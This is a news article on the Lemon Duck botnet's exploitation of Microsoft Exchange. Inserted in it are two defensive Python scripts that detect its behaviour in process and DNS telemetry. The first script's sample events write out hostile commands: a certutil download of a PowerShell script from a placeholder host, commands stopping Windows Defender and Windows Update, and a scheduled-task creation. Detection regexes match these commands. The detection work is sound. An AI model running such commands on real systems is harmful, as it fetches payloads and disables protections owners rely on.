Researchers have examined the latest activity of the Lemon Duck cybercriminal group, including its exploitation of Microsoft Exchange Server vulnerabilities and its use of fake top-level domains.
The exploitation of Microsoft Exchange Server vulnerabilities by cybercriminals has been a disaster for the security of thousands of organizations.
Four major vulnerabilities, collectively known as ProxyLogon, affected on-premises Microsoft Exchange 2013, 2016 and 2010 servers. Patches, vulnerability detection tools and mitigation guidance were available in March, but it is still estimated that up to 60,000 companies may have been compromised. Exploit code is now also available, and at least 10 sophisticated cybercriminal groups have adopted the flaws in their attacks this year.
Lemon Duck botnet under the microscope
At the end of March, Microsoft warned that the botnet was trying to exploit vulnerable servers and use the compromised systems to mine cryptocurrency. Today, Cisco Talos researchers published an in-depth analysis of the group's tactics.
Lemon Duck operators are integrating new tools to “increase the effectiveness of their campaigns” by targeting vulnerabilities in Microsoft Exchange Server. Telemetry from DNS queries to Lemon Duck's domains indicates that campaign activity peaked in April. Most of the queries came from the United States, followed by Europe and Southeast Asia. There was also a significant increase in queries for one Lemon Duck domain from India.
Lemon Duck operators use automated tools to scan for, detect and exploit servers before installing payloads such as Cobalt Strike DNS beacons and web shells, which in turn allow cryptocurrency mining software and additional malware to run.
The malware and its related PowerShell scripts attempt to remove antivirus products from vendors such as ESET and Kaspersky, and to stop any service that could hinder the infection, including Windows Update and Windows Defender.
Scheduled tasks are created to maintain persistence, and in recent campaigns the CertUtil command-line utility has been used to download two new PowerShell scripts that are responsible for removing antivirus products, establishing persistence, and downloading variants of the XMRig cryptocurrency miner.
Signatures of competing cryptocurrency miners are also listed in a “killer” module designed to remove them.
SMBGhost and EternalBlue were used in past campaigns, but with the Microsoft Exchange Server exploits the group's tactics continue to evolve.
In an attempt to disguise its command-and-control (C2) infrastructure, Lemon Duck has also registered domains under the country-code top-level domains (ccTLDs) for China, Japan and South Korea.
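The host-side behaviours described above (a CertUtil download of PowerShell scripts, Windows Defender and Windows Update being stopped, scheduled-task persistence, and shells spawned from the Exchange web server by a web shell) are the kind of thing a defender can correlate in process-creation telemetry. The following is an added example, not code from the article or from Cisco Talos. The events are constructed in a Sysmon-like shape (hostnames, paths and the URL are placeholders), the rule names and the three-rule threshold are assumptions, and the service names `WinDefend` and `wuauserv` are the standard Windows names for Defender and Windows Update.

```python
"""Behavioural detection over Windows process-creation events.

Added example, not code from the article or from Cisco Talos. The events
below are constructed (hostnames, paths and the URL are placeholders) and
the rule names and threshold are assumptions. The rules map to behaviours
the article describes: a CertUtil download of PowerShell scripts, stopping
Windows Defender / Windows Update, scheduled-task persistence, and a shell
spawned by the IIS worker process that hosts Exchange (web shell activity).
"""
import re
from collections import defaultdict

# Constructed sample telemetry, one dict per process start (Sysmon-like fields).
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe report.txt"},
    {"host": "exch-01", "parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c certutil.exe -urlcache -split -f "
                "http://placeholder.invalid/stage.ps1 C:\\Windows\\Temp\\s.ps1"},
    {"host": "exch-01", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Windows\\Temp\\s.ps1"},
    {"host": "exch-01", "parent": "powershell.exe", "image": "sc.exe",
     "cmdline": "sc.exe stop WinDefend"},
    {"host": "exch-01", "parent": "powershell.exe", "image": "net.exe",
     "cmdline": "net stop wuauserv"},
    {"host": "exch-01", "parent": "powershell.exe", "image": "schtasks.exe",
     "cmdline": "schtasks /create /tn Updater /tr C:\\Windows\\Temp\\s.ps1 /sc minute /mo 30"},
    {"host": "ws-02", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# Case-insensitive patterns for each behaviour the article describes.
CERTUTIL_DL = re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)
SVC_STOP = re.compile(
    r"\b(?:sc(?:\.exe)?\s+(?:stop|config|delete)|net(?:\.exe)?\s+stop|Stop-Service|Set-Service)\b"
    r".*\b(?:WinDefend|wuauserv)\b", re.I)
SCHTASK_CREATE = re.compile(r"schtasks(\.exe)?\b.*/create\b", re.I)
IIS_WORKER = {"w3wp.exe"}              # IIS worker process that serves Exchange web endpoints
SHELLS = {"cmd.exe", "powershell.exe"}

# Each rule: (name, predicate over one event).
RULES = [
    ("certutil_remote_download", lambda e: bool(CERTUTIL_DL.search(e["cmdline"]))),
    ("defender_or_update_service_stopped", lambda e: bool(SVC_STOP.search(e["cmdline"]))),
    ("scheduled_task_created", lambda e: bool(SCHTASK_CREATE.search(e["cmdline"]))),
    ("shell_spawned_by_iis_worker",
     lambda e: e["parent"].lower() in IIS_WORKER and e["image"].lower() in SHELLS),
]


def evaluate(events):
    """Return a list of (host, rule_name, cmdline) for every rule an event trips."""
    alerts = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                alerts.append((e["host"], name, e["cmdline"]))
    return alerts


def hosts_with_chain(alerts, min_rules=3):
    """Hosts on which at least `min_rules` distinct rules fired (assumed threshold).

    Any one rule (a single scheduled task, say) is noisy on its own; several of
    these behaviours on the same host is the sequence the article describes.
    """
    per_host = defaultdict(set)
    for host, name, _ in alerts:
        per_host[host].add(name)
    return sorted(h for h, names in per_host.items() if len(names) >= min_rules)


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for host, rule, cmd in found:
        print(f"{host:8} {rule:36} {cmd}")
    print("hosts with behaviour chain:", hosts_with_chain(found))
```

The per-host threshold is the design point: each rule alone fires on legitimate administration, so alerting on the combination (download, defence tampering, persistence, shell from the web tier) within one host is what keeps the signal usable.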
“Considering that these ccTLDs are often used for websites in their respective countries and languages, it is interesting that they were used in connection with this attack, rather than the more common and universally used TLDs such as ‘.com’ or ‘.net’,” Cisco Talos notes. “This will allow the malicious actor to more effectively hide communications for the control server in other web traffic in the victim’s environment.”
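The point in the quote is that ccTLDs like .cn, .jp and .kr stand out only relative to what a given environment normally resolves, so the practical check is a baseline of the organisation's usual TLDs and a report on lookups outside it. The following is an added example, not code from the article or from Cisco Talos. The resolver log lines are constructed (clients and names are placeholders), the baseline and watched TLD sets are assumptions about a hypothetical environment, and treating a high share of TXT queries as a hint of DNS-based C2 (the article mentions Cobalt Strike DNS beacons) is an assumption of this example, not a claim from the report.

```python
"""Flag DNS lookups to top-level domains that are unusual for an environment.

Added example, not code from the article or from Cisco Talos. The resolver
log lines are constructed (clients and names are placeholders), and both the
baseline TLD set and the watched ccTLD set are assumptions about a
hypothetical environment.
"""
import re
from collections import Counter, defaultdict

# Constructed resolver log: timestamp, client, "query", name, record type.
SAMPLE_LOG = """\
2021-04-12T09:01:02Z 10.0.5.21 query www.example.com A
2021-04-12T09:01:03Z 10.0.5.21 query cdn.example.net A
2021-04-12T09:02:10Z 10.0.5.44 query update.example.org A
2021-04-12T09:05:40Z 10.0.5.21 query a1.placeholder-c2.jp A
2021-04-12T09:05:41Z 10.0.5.21 query a2.placeholder-c2.jp TXT
2021-04-12T09:06:00Z 10.0.5.44 query b1.placeholder-c2.cn TXT
2021-04-12T09:06:01Z 10.0.5.44 query b2.placeholder-c2.cn TXT
2021-04-12T09:07:00Z 10.0.5.44 query c1.placeholder-c2.kr TXT
2021-04-12T09:08:00Z 10.0.5.60 query mail.example.com MX
2021-04-12T09:09:00Z 10.0.5.60 query partner.example.co.uk A
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\s+(?P<name>\S+)\s+(?P<qtype>\S+)$")

BASELINE_TLDS = {"com", "net", "org", "uk"}   # assumption: what this environment normally resolves
WATCHED_CCTLDS = {"cn", "jp", "kr"}           # ccTLDs the report says Lemon Duck used for C2


def tld_of(name):
    """Last label of a DNS name, lower-cased ('a.b.example.jp' -> 'jp')."""
    return name.rstrip(".").rsplit(".", 1)[-1].lower()


def parse_log(text):
    """Parse the constructed resolver lines into dicts; unparseable lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def off_baseline_lookups(records, baseline=BASELINE_TLDS):
    """Group lookups whose TLD is not in the baseline by (client, tld)."""
    grouped = defaultdict(list)
    for r in records:
        tld = tld_of(r["name"])
        if tld not in baseline:
            grouped[(r["client"], tld)].append(r)
    return dict(grouped)


def watched_cctld_report(records, baseline=BASELINE_TLDS, watched=WATCHED_CCTLDS):
    """For each (client, tld) in the watched ccTLD set: lookup count and TXT-query share.

    A TXT-heavy stream to an otherwise unused ccTLD is worth a closer look because
    DNS-based C2 channels commonly carry data in TXT answers; this is a hint for
    triage, not proof, and using it as one is an assumption of this example.
    """
    report = []
    for (client, tld), recs in sorted(off_baseline_lookups(records, baseline).items()):
        if tld not in watched:
            continue
        qtypes = Counter(r["qtype"].upper() for r in recs)
        txt_share = qtypes["TXT"] / len(recs)
        report.append({"client": client, "tld": tld, "lookups": len(recs),
                       "txt_share": round(txt_share, 2)})
    return report


if __name__ == "__main__":
    for row in watched_cctld_report(parse_log(SAMPLE_LOG)):
        print(row)
```

The baseline does the real work: the same .jp lookup is benign in a company with Japanese customers and anomalous in one that has never resolved that ccTLD before, which is exactly why the quote frames the choice of TLD as notable relative to the victim's normal traffic.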
Links have also been found between the Lemon Duck botnet and the Beapy/Pcastle cryptocurrency malware.
“The use of new tools such as Cobalt Strike and the implementation of additional obfuscation techniques throughout the attack life cycle will allow them to function more effectively in the attack for a longer period of time.” “With new tactics and additional host-based evidence, this actor is now showing a particular interest in Exchange servers as it seeks to compromise additional systems and maintain and/or increase the number of systems in the Lemon Duck botnet.”